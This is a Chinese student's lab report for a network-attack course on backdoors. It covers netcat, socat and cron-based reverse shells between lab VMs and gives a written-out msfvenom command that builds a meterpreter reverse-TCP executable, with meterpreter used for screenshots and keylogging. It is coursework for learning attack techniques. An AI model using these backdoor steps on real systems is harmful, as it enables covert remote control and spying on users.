zoukankan      html  css  js  c++  java
  • 20145320周岐浩 《网络对抗技术》 后门原理与实践

    20145320周岐浩 《网络对抗技术》 后门原理与实践

    基础问题回答

    例举你能想到的一个后门进入到你系统中的可能方式?

    • 收到一些感兴趣的邮件内容(例如可爱的宠物狗和猫),点进去之后就被开了后门。
    • 盗版软件的安装包中可能会有后门(正版也有!!!!)
    • 在不可靠、不安全的网站中下载的解压压缩文件时里面含有后门程序;

    例举你知道的后门如何启动起来(win及linux)的方式?

    • 被篡改了注册表
    • 设置了任务计划启动,例如开机时。
    • 把后门的名字设置类似服务名,迷惑用户!

    Meterpreter有哪些给你映像深刻的功能?

    • 在其之下,再无隐私!

    如何发现自己有系统有没有被安装后门?

    • 查看注册表、进程、服务等,是否有未知的程序

    实验总结与体会

    盗版软件不安全!正版软件要收费!反正360都已经把我们的隐私给卖了...还是用盗版吧..但是能不给权限尽量不给权限!经过这几次实验感觉我们的电脑简直不堪一击,想干嘛就干嘛。黑客开心就好...

    开始实验!

    首先先ping通两台linux和windows:

    linux使用netcat获得windows的shell

    • 打开netcat监听端口

    • 在windows中使用netcat绑定cmd连接到linux的正在监听的端口

    • 这样linux就获取到了winows的shell

    Windows使用netcat获得Linux的shell:

    方法同上类似,这里不再列举。但是需要注意的是linux的shell应该是在/bin/sh

    设置cron启动,windows使用netcat获得linux的shell

    在linux中使用crontab指令增加一条定时3分钟任务则利用netcat连接道控制端的命令

    windows一直开启netcat监听,等到3分后,windows获取linux的shell成功

    windows使用sotcat获得linux的shell:

    在linux中,使用socat绑定bash与端口号,监听,等待连接


    windows中使用socat对linux进行tcp固定端口连接,成功获取linux的shell!注意所使用的端口号不能被占用!!

    使用MSF meterpreter生成后门并传到被控主机获取shell

    • 生成可执行文件(反弹式),确定好反弹回来的IP地址与端口号。需要注意的是这里老师给的是

        root@KaliYL:/home/YL# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.20.136 `PORT=443 -f exe > meter_backdoor.exe
      

    注意不是 `PORT而是LPORT(location port!)

    在linux中,使用MSF设置好可执行文件对应的IP地址、端口号和payload后,打开监听进程

    由于vmware支持直接拖拽,所以省下了传输的步骤。在win中双击运行可执行文件以前,需要将win中的杀毒软件与防火墙设置一下。设置后再双击启动win上的可执行文件,linux成功获取winows的shell

    使用MSF meterpreter生成获取目标主机某些内容

    • 获取目标主机的当前屏幕

    • 获取目标主机的击键记录

      这里可以看到在小键盘和普通键盘的输入并不一样。

    • 在提权的过程中失败了

  • 相关阅读:
    VMware 克隆一个虚拟机(win7)
    HDU 5695 Gym Class (拓扑排序、贪心、优先队列)
    HDU2647 Reward (拓扑排序、反向建图)
    HDU 3342 Legal or Not (拓扑排序、有向图是否存在环)
    Vue框架简介及简单使用
    Linux文件常用指令
    Linux系统相关命令
    Linux关机指令详解
    linux目录结构
    Linux用户相关命令
  • 原文地址:https://www.cnblogs.com/zqh20145320/p/6556861.html
Copyright © 2011-2022 走看看